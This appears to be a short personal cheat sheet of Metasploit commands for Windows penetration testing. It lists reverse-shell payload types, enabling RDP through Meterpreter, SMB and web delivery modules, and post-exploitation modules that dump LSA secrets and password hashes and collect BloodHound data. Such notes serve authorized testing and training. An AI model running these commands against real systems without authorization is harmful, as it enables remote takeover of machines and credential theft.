Metasploit

Resources

Payload Types

Unstaged

  • windows/shell_reverse_tcp: The entire shell is contained in this one payload, so I can catch the callback with nc.

Staged

  • windows/shell/reverse_tcp: I'd need to use Metasploit's exploit/multi/handler to get the callback.

RDP Access from Meterpreter Shell

run getgui -e
shell

Useful Commands

#Load PowerShell within Meterpreter
load powershell

#Deliver exploit via SMB
use exploit/windows/smb/smb_delivery

#Deliver exploit via Web
use multi/script/web_delivery
set target 3

Windows Post-Exploitation

run post/windows/gather/lsa_secrets
run post/windows/gather/hashdump
run post/windows/gather/bloodhound

upload C:\\Users\\Admin\\file.ps1
